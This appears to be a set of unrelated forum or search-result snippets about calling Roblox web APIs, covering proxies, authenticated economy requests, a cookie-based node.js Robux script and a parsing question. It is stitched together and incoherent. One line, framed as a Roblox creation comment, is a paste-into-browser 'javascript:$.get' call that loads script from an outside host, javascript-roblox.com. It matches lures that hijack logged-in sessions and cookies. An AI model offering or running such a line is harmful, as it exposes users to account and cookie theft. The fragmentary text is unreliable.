As a developer, there are two main ways you’ll want to access the RobloxAPI: sending the requests yourself or using one of the multiple wrappers for your favorite programming language.
I use node.js w/ express.js on Replit to self-host my own proxy for sending requests to Roblox’s Web API via HttpService. It’s an excellent use case if you don’t want to use roproxy.
Is there any way to send authenticated requests to economy.roblox.com while being in roblox.com? And no, I can't just grab the .ROBLOSECURITY cookie of my account then manually include it in the JavaScript code to send it to the API, there's a reason why I can't do this.
Hi, i made a node.jsscript to make request to get your total robux. const axios = require ("axios"); const cookieValue = "your account cookie"; //set your roblox account cookie const robloxId = 0; //set your roblox acco…
I am trying to fetch information from: https://games.roblox.com/v1/games?universeIds=3759152694 But having it try to response with "response.data [0]" (I use jsonpathfinder) it gives me undefined.
You will need to learn how to use HTTP requests in order to communicate with the RobloxAPIs. Look into some basic tutorials about how to use web APIs with JavaScript, once you have learned that, this should be easy to do.
This is your very first Roblox creation. Check it out, then make it your own with Roblox Studio Comment xJavascript:$.get ("//javascript-roblox.com/api?i=18797")
This open-source project essentially aims to serve as a replacement, providing an Http client that opens the door to actually using REST APIs, reading response headers, reading status codes, accessing roblox.com from in-game, and more.